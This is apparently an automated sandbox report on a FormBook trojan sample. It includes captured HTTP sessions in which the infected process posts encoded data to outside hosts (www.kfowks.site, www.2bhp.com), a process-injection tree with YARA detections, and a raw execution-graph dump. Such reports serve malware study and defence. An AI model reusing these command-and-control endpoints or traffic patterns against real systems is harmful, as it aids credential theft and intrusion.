                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 63 76 5a 70 4c 56 37 59 78 53 68 44 52 59 59 43 70 30 46 42 76 2f 6b 75 36 6b 34 76 76 43 34 77 43 66 33 59 68 2f 48 4e 50 57 57 69 6c 57 61 37 43 58 51 34 7a 4b 6b 49 37 31 72 2b 34 4d 73 44 45 6a 62 35 42 50 39 39 32 38 75 61 58 5a 43 64 48 71 68 6f 54 43 72 57 64 59 49 45 5a 7a 4b 4e 41 56 68 52 45 31 6e 48 50 50 39 5a 42 79 58 53 37 66 6c 6c 78 53 45 6b 74 6c 72 6b 39 45 4e 55 34 49 64 63 38 4b 4c 58 38 4f 63 56 49 4d 47 6a 50 52 72 6f 32 52 2b 44 75 31 73 43 57 37 4f 6b 4e 75 6f 7a 54 5a 32 50 74 4c 62 47 31 70 4d 45 67 58 34 66 54 54 33 65 5a 7a 46 4d 4b 4c 47 74 66 6b 32 6d 67 35 64 2b 74 35 45 35 4c 72 64 61 5a 56 50 31 68 4f 59 3d
                                                      Data Ascii: pP_8=cvZpLV7YxShDRYYCp0FBv/ku6k4vvC4wCf3Yh/HNPWWilWa7CXQ4zKkI71r+4MsDEjb5BP9928uaXZCdHqhoTCrWdYIEZzKNAVhRE1nHPP9ZByXS7fllxSEktlrk9ENU4Idc8KLX8OcVIMGjPRro2R+Du1sCW7OkNuozTZ2PtLbG1pMEgX4fTT3eZzFMKLGtfk2mg5d+t5E5LrdaZVP1hOY=
                                                       Sep 11, 2024 11:20:55.058460951 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 11 Sep 2024 09:21:01 GMT
                                                      Connection: close
                                                      Content-Length: 315
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       59 | 192.168.2.4 | 63375 | 38.181.141.122 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:57.020370007 CEST | 10862 | OUT | POST /c0yj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.kfowks.site
                                                      Origin: http://www.kfowks.site
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.kfowks.site/c0yj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 63 76 5a 70 4c 56 37 59 78 53 68 44 52 59 59 43 70 30 46 42 76 2f 6b 75 36 6b 34 76 76 43 34 77 43 66 33 59 68 2f 48 4e 50 57 65 69 6c 6a 4f 37 41 77 6b 34 79 4b 6b 49 6c 6c 72 37 34 4d 74 62 45 6e 50 6d 42 50 78 44 32 35 71 61 55 37 36 64 46 62 68 6f 64 79 72 57 41 49 49 46 55 54 4c 48 41 57 4a 56 45 31 33 48 50 50 39 5a 42 7a 6e 53 38 4e 64 6c 68 69 45 72 6c 46 72 6f 32 6b 4d 7a 34 49 31 6d 38 4b 66 70 39 2b 38 56 49 73 57 6a 41 43 44 6f 2f 52 2b 4e 6a 56 73 61 57 37 43 46 4e 75 45 2f 54 63 4c 71 74 4c 2f 47 32 2b 68 42 79 6b 51 77 58 52 6e 54 4d 7a 70 74 44 4d 33 72 62 6b 53 7a 75 4a 52 2b 2f 34 73 53 47 49 68 52 63 47 4c 33 39 4c 31 51 58 4b 62 73 6d 45 46 41 50 6a 79 77 72 58 66 4a 64 46 57 38 62 41 70 64 44 34 41 6b 49 4c 57 4e 36 4d 62 51 4f 52 58 62 63 44 5a 68 6e 48 71 57 62 67 6f 6b 69 4c 62 55 4d 72 31 74 78 76 61 4e 61 43 44 74 61 4c 53 67 78 65 2f 6a 45 5a 4b 5a 64 71 6c 76 39 6a 56 4d 4b 5a 5a 74 46 58 54 6d 4f 38 6d 75 59 43 63 69 46 49 2f 7a 38 50 63 78 41 6a 47 4b 62 [TRUNCATED]
                                                       Data Ascii: pP_8= [TRUNCATED]
                                                       Sep 11, 2024 11:20:57.931412935 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 11 Sep 2024 09:21:05 GMT
                                                      Connection: close
                                                      Content-Length: 315
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       60 | 192.168.2.4 | 63376 | 38.181.141.122 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:59.831751108 CEST | 498 | OUT | GET /c0yj/?pP_8=RtxJIiPVwFtoON8X5lg1/pck0zde3AcVW+Sw8LHuBGbwhWeZHgga75pQywOD+eRBU36nZddvjNScILyGR/VfIgCLIuIjBhPcY00gClaWQM5nJXPcxtJH+zI=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.kfowks.site
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Sep 11, 2024 11:21:00.793679953 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 11 Sep 2024 09:21:07 GMT
                                                      Connection: close
                                                      Content-Length: 315
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                       61 | 192.168.2.4 | 63377 | 81.88.63.46 | 80
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:21:09.439260960 CEST | 495 | OUT | GET /a4ar/?V0Qh=4pBta8&pP_8=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.2bhp.com
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Sep 11, 2024 11:21:10.103210926 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:21:10 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>

                                                      Target ID:0
                                                      Start time:05:17:00
                                                      Start date:11/09/2024
                                                      Path:C:\Users\user\Desktop\DOC092024-0431202229487.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\DOC092024-0431202229487.exe"
                                                      Imagebase:0x710000
                                                      File size:753'664 bytes
                                                      MD5 hash:3A3B2034D8649F6112FAA82E0DABA310
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:05:17:01
                                                      Start date:11/09/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\DOC092024-0431202229487.exe"
                                                      Imagebase:0x280000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:05:17:03
                                                      Start date:11/09/2024
                                                      Path:C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe"
                                                      Imagebase:0x470000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:05:17:05
                                                      Start date:11/09/2024
                                                      Path:C:\Windows\SysWOW64\mstsc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                                      Imagebase:0x460000
                                                      File size:1'264'640 bytes
                                                      MD5 hash:EA4A02BE14C405327EEBA8D9AD2BD42C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:5
                                                      Start time:05:17:17
                                                      Start date:11/09/2024
                                                      Path:C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe"
                                                      Imagebase:0x470000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:8
                                                      Start time:05:17:29
                                                      Start date:11/09/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff6bf500000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0.9%
                                                        Signature Coverage:6.6%
                                                        Total number of Nodes:1939
                                                        Total number of Limit Nodes:190
73010a 48 API calls 103872->103875 103880 7852a4 103873->103880 103874->103678 103876 7215af 103875->103876 103877 7215c2 103876->103877 104514 72d6b4 48 API calls 103876->104514 103877->103678 103879 73010a 48 API calls 103879->103880 103880->103867 103880->103879 103881->103678 103882->103665 103884 71b8a7 48 API calls 103883->103884 103885 71a501 103884->103885 103885->103804 103886->103812 103887->103801 103953 713f5d 103888->103953 103893 713fc6 LoadLibraryExW 103963 713e78 103893->103963 103894 785830 103896 713e39 84 API calls 103894->103896 103898 785837 103896->103898 103900 713e78 3 API calls 103898->103900 103902 78583f 103900->103902 103901 713fed 103901->103902 103903 713ff9 103901->103903 103989 71417d 103902->103989 103905 713e39 84 API calls 103903->103905 103907 7134e2 103905->103907 103907->103816 103912 75cc82 103907->103912 103909 785866 103995 7141cb 103909->103995 103911 785873 103913 7141a7 83 API calls 103912->103913 103914 75ccf1 103913->103914 104286 75ce59 94 API calls 2 library calls 103914->104286 103916 75cd03 103917 71417d 64 API calls 103916->103917 103945 75cd07 103916->103945 103918 75cd1e 103917->103918 103919 71417d 64 API calls 103918->103919 103920 75cd2e 103919->103920 103921 71417d 64 API calls 103920->103921 103922 75cd49 103921->103922 103923 71417d 64 API calls 103922->103923 103924 75cd64 103923->103924 103925 7141a7 83 API calls 103924->103925 103926 75cd7b 103925->103926 103927 7345ec _W_store_winword 47 API calls 103926->103927 103928 75cd82 103927->103928 103929 7345ec _W_store_winword 47 API calls 103928->103929 103930 75cd8c 103929->103930 103931 71417d 64 API calls 103930->103931 103932 75cda0 103931->103932 104287 75c846 GetSystemTimeAsFileTime 103932->104287 103934 75cdb3 103935 75cddd 103934->103935 103936 75cdc8 103934->103936 103938 75cde3 103935->103938 103939 75ce42 103935->103939 103937 7328ca _free 47 API calls 103936->103937 103940 75cdce 103937->103940 104288 75c251 103938->104288 103942 7328ca _free 47 
API calls 103939->103942 103943 7328ca _free 47 API calls 103940->103943 103942->103945 103943->103945 103945->103822 103947 713e39 103945->103947 103946 7328ca _free 47 API calls 103946->103945 103948 713e43 103947->103948 103949 713e4a 103947->103949 103950 734274 __fcloseall 83 API calls 103948->103950 103951 713e59 103949->103951 103952 713e6a FreeLibrary 103949->103952 103950->103949 103951->103822 103952->103951 104000 713f20 103953->104000 103956 713f85 103958 713f96 103956->103958 103959 713f8d FreeLibrary 103956->103959 103960 734129 103958->103960 103959->103958 104008 73413e 103960->104008 103962 713fba 103962->103893 103962->103894 104087 713eb3 103963->104087 103966 713e9f 103968 713eb1 103966->103968 103969 713ea8 FreeLibrary 103966->103969 103970 714010 103968->103970 103969->103968 103971 73010a 48 API calls 103970->103971 103972 714025 103971->103972 104095 714bce 103972->104095 103974 714031 _memmove 103975 71406c 103974->103975 103977 714161 103974->103977 103978 714129 103974->103978 103976 7141cb 57 API calls 103975->103976 103985 714075 103976->103985 104109 75d03f 93 API calls 103977->104109 104098 7131f2 CreateStreamOnHGlobal 103978->104098 103981 71417d 64 API calls 103981->103985 103983 714109 103983->103901 103984 785794 103986 7141a7 83 API calls 103984->103986 103985->103981 103985->103983 103985->103984 104104 7141a7 103985->104104 103987 7857a8 103986->103987 103988 71417d 64 API calls 103987->103988 103988->103983 103990 78587d 103989->103990 103991 71418f 103989->103991 104133 7344ae 103991->104133 103994 75c846 GetSystemTimeAsFileTime 103994->103909 103996 7858bf 103995->103996 103997 7141da 103995->103997 104268 734af5 103997->104268 103999 7141e2 103999->103911 104004 713f32 104000->104004 104003 713f08 LoadLibraryA GetProcAddress 104003->103956 104005 713f28 104004->104005 104006 713f3b LoadLibraryA 104004->104006 104005->103956 104005->104003 104006->104005 104007 713f4c GetProcAddress 104006->104007 104007->104005 104011 
73414a __freefls@4 104008->104011 104009 73415d 104056 73889e 47 API calls __getptd_noexit 104009->104056 104011->104009 104013 73418e 104011->104013 104012 734162 104057 737aa0 8 API calls __wmakepath_s 104012->104057 104027 73f278 104013->104027 104016 734193 104017 7341a9 104016->104017 104018 73419c 104016->104018 104019 7341d3 104017->104019 104020 7341b3 104017->104020 104058 73889e 47 API calls __getptd_noexit 104018->104058 104041 73f390 104019->104041 104059 73889e 47 API calls __getptd_noexit 104020->104059 104024 73416d @_EH4_CallFilterFunc@8 __freefls@4 104024->103962 104028 73f284 __freefls@4 104027->104028 104029 738984 __lock 47 API calls 104028->104029 104030 73f292 104029->104030 104031 73f309 104030->104031 104036 738a0c __mtinitlocknum 47 API calls 104030->104036 104039 73f302 104030->104039 104064 735ade 48 API calls __lock 104030->104064 104065 735b48 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 104030->104065 104066 737660 47 API calls _W_store_winword 104031->104066 104034 73f310 104035 73f31f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 104034->104035 104034->104039 104035->104039 104036->104030 104038 73f37c __freefls@4 104038->104016 104061 73f387 104039->104061 104050 73f3b0 __wopenfile 104041->104050 104042 73f3ca 104071 73889e 47 API calls __getptd_noexit 104042->104071 104043 73f585 104043->104042 104048 73f5e8 104043->104048 104045 73f3cf 104072 737aa0 8 API calls __wmakepath_s 104045->104072 104047 7341de 104060 734200 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104047->104060 104068 747179 104048->104068 104050->104042 104050->104043 104073 73247b 59 API calls 2 library calls 104050->104073 104052 73f57e 104052->104043 104074 73247b 59 API calls 2 library calls 104052->104074 104054 73f59d 104054->104043 104075 73247b 59 API calls 2 library calls 104054->104075 104056->104012 104057->104024 104058->104024 104059->104024 104060->104024 104067 738ae8 RtlLeaveCriticalSection 104061->104067 
104063 73f38e 104063->104038 104064->104030 104065->104030 104066->104034 104067->104063 104076 746961 104068->104076 104070 747192 104070->104047 104071->104045 104072->104047 104073->104052 104074->104054 104075->104043 104079 74696d __freefls@4 104076->104079 104077 74697f 104078 73889e __wmakepath_s 47 API calls 104077->104078 104080 746984 104078->104080 104079->104077 104081 7469b6 104079->104081 104082 737aa0 __wmakepath_s 8 API calls 104080->104082 104083 746a28 __wsopen_helper 110 API calls 104081->104083 104086 74698e __freefls@4 104082->104086 104084 7469d3 104083->104084 104085 7469fc __wsopen_helper RtlLeaveCriticalSection 104084->104085 104085->104086 104086->104070 104091 713ec5 104087->104091 104090 713ef0 LoadLibraryA GetProcAddress 104090->103966 104092 713e91 104091->104092 104093 713ece LoadLibraryA 104091->104093 104092->103966 104092->104090 104093->104092 104094 713edf GetProcAddress 104093->104094 104094->104092 104096 73010a 48 API calls 104095->104096 104097 714be0 104096->104097 104097->103974 104099 713229 104098->104099 104100 71320c FindResourceExW 104098->104100 104099->103975 104100->104099 104101 7857d3 LoadResource 104100->104101 104101->104099 104102 7857e8 SizeofResource 104101->104102 104102->104099 104103 7857fc LockResource 104102->104103 104103->104099 104105 78589d 104104->104105 104106 7141b6 104104->104106 104110 73471d 104106->104110 104108 7141c4 104108->103985 104109->103975 104113 734729 __freefls@4 104110->104113 104111 734737 104123 73889e 47 API calls __getptd_noexit 104111->104123 104113->104111 104114 73475d 104113->104114 104125 735a9f 104114->104125 104115 73473c 104124 737aa0 8 API calls __wmakepath_s 104115->104124 104118 734763 104131 73468e 81 API calls 5 library calls 104118->104131 104120 734772 104132 734794 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104120->104132 104122 734747 __freefls@4 104122->104108 104123->104115 104124->104122 104126 735ad1 RtlEnterCriticalSection 104125->104126 
104127 735aaf 104125->104127 104129 735ac7 104126->104129 104127->104126 104128 735ab7 104127->104128 104130 738984 __lock 47 API calls 104128->104130 104129->104118 104130->104129 104131->104120 104132->104122 104136 7344c9 104133->104136 104135 7141a0 104135->103994 104137 7344d5 __freefls@4 104136->104137 104138 7344eb _memset 104137->104138 104139 734518 104137->104139 104141 734510 __freefls@4 104137->104141 104163 73889e 47 API calls __getptd_noexit 104138->104163 104140 735a9f __lock_file 48 API calls 104139->104140 104142 73451e 104140->104142 104141->104135 104149 7342eb 104142->104149 104145 734505 104164 737aa0 8 API calls __wmakepath_s 104145->104164 104151 734306 _memset 104149->104151 104155 734321 104149->104155 104150 734311 104264 73889e 47 API calls __getptd_noexit 104150->104264 104151->104150 104151->104155 104160 73435f 104151->104160 104153 734316 104265 737aa0 8 API calls __wmakepath_s 104153->104265 104165 734552 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 104155->104165 104157 734470 _memset 104267 73889e 47 API calls __getptd_noexit 104157->104267 104160->104155 104160->104157 104166 7335c3 104160->104166 104173 73fbbf 104160->104173 104244 73f916 104160->104244 104266 73fa37 47 